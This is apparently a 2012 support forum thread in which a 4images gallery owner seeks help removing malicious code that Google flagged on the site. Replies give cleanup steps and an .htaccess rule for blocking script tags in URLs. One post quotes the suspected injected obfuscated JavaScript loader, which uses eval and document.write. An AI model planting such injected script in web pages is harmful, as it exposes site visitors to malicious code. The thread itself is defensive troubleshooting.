4images Forum & Community
4images Issues / Ausgaben => Discussion & Troubleshooting => Topic started by: lordi on April 22, 2012, 04:18:14 PM
-
Hello
I got a message from Google Webmasters Tools saying that Google detected a harmful code in my Gallery
I upgraded from 1.7.7 to 1.7.10 directly after I saw this message !!!
Well, I couldn't reach the path it gives me to remove the injection ... CAN ANYONE HELP ME PLZ ?????????????????????????
code removed @Rembrandt
what shall I do to remove the harmful code ???
-
...what shall I do to remove the harmful code ???
1.) Do not longer login on your FTP or Web Interface
2.) Check with a Powerfull Antivirus Program your Home PC .
(There is very Important, the most Trojaner on the websites come from own PC per FTP.)
3.) If your Sytem clean change all your FTP and SQL passwords.
4.) Do not call your website
5.) Login on your FTP and remove the Code, check all your *.php and *html files on your FTP server.
6.) Have you all this done, call your website and check with the Online Antivirus Program your website.
Edit: it does not matter whether virus or trojan
mfg Andi
-
I did all what u said above
but, HOW DO I GET THE HARMFUL CODE OFF the FILES in the /gallery????????
knowing that I couldn't find the code in /categories.php
here's the Error Code and believe me it has nothing harmful here and no link for it::::: Just look at it and tell me what to do
/gallery/categories.php?cat_id=3&sessionid=1371559e943a1dbd836f4b568bd70eb2
this is what I need help with
-
mean you, of where he comes the trojans ?
they have been looking into their categries.html ?
what for error code, this?
/gallery/categories.php?cat_id=3&sessionid=1371559e943a1dbd836f4b568bd70eb2
this is not a error code
-
the suspected injected code is the following
<script>function tRsEFox(bzrJSZR){ fff.op.replace("v");wind
ow.eval(); fff.op.replace("v"); }
var tOUU=document;document['wr1ite'.replace(/[0-9]/,'')](une
scape(document.getElementById('tIz').value));function rHHBLj
WHwe(KJndr){ window.eval();var vUklVhv = document.getElement
ById('YBI'); }
</script>
and it is injected in the following:
/gallery/categories.php?cat_id=2&sessionid=1371559e943a1dbd836f4b568bd70eb2
please help me
-
Hi,
It' seems the Javascript code is injected via your URL.
To avoid such harmful activities, add the following code in your .htaccess of your gallery.
It may help you in future.
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR].
Br,
satz
-
SathishIPL : thank you just added an htaccess and included the 2 lines u gave me
- Now, How do I remove the current <script> code ?? where do I find it specifically ????
-
Hi,
I am not sure, but try it in templates/your templates/header.html OR Footer.html files .
But it will be .html files
br,
Satz